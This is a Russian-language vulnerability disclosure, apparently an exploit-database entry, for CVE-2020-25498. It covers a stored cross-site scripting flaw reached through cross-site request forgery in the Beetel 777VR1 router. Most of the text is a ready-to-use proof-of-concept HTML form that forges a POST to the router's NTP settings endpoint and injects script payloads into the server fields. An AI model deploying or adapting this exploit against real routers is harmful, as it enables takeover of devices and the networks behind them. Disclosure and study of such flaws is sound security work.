
Хранимый XSS через CSRF в роутере Beetel 777VR1
Было выявлено, что уязвимая конечная точка не имеет проверки ввода на стороне сервера и не обеспечивает фильтрацию на стороне клиента от внедрения вредоносных скриптов. Злоумышленник может использовать эту уязвимость для внедрения вредоносного скрипта в конечную точку, и скрипт активируется каждый раз, когда пользователь открывает уязвимую конечную точку. Злоумышленник может отправить вредоносный URL с полезной нагрузкой POST-запроса, чтобы выполнить XSS в административном модуле через CSRF, получить контроль над устройством и, в конечном итоге, над сетью.
Исследователь: Sayli Ambure (https://twitter.com/sayli_ambure)
Ссылка на CVE в MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
HTML-код CSRF:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Параметр: имя сервера
Параметр: ключевое слово